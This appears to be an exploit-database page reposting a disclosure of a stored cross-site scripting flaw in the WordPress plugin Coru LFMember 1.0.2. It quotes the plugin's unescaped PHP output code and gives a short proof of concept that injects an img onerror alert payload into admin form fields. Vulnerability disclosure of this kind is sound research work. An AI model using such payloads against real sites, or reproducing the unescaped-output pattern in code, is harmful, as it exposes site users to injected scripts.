WordPress Coru LFMember 1.0.2 Cross Site Scripting
CVE
Category
Price
Severity
CVE-2021-24504
CWE-79
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-04-26
CPE
cpe:cpe:/a:wordpress:coru-lfmember:1.0.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040099 Below is a copy:
WordPress Coru LFMember 1.0.2 Cross Site Scripting # Exploit Title: WordPress Plugin Coru LFMember - Stored Cross Site
Scripting
# Date: 26-04-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/
# Version: 1.0.2
# Tested on: Firefox
# Contact me: [email protected]
# Vulnerable Code:
```
<td class="manage-column"><input type="text" value="<?php print
$result['game_image'] ?>" name="game_image[]" /></td>
<td class="manage-column"><?php print
stripslashes($result['game_name_short']) ?></td>
<td class="manage-column"><input type="text" value="<?php print
stripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td>
<td class="manage-column"><textarea name="game_description[]" rows="4"
cols="10"><?php print stripslashes($result['game_description'])
?></textarea></td>
<td class="manage-column"><input type="text" value="<?php print
$result['game_link'] ?>" name="game_link[]" /></td>
```
# POC
1. Install the Coru LFMember WordPress plugin and activate it.
2. Go to LFMember -> Add New and inject XSS payload ><img src=x
onerror=alert(1)> in the fields given i.e, Game Image Name, Game Short
Name, Game Long Name, Game Description, and Links to.
3. XSS will trigger and will be stored.
## POC Image
https://imgur.com/kZDtIVz
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum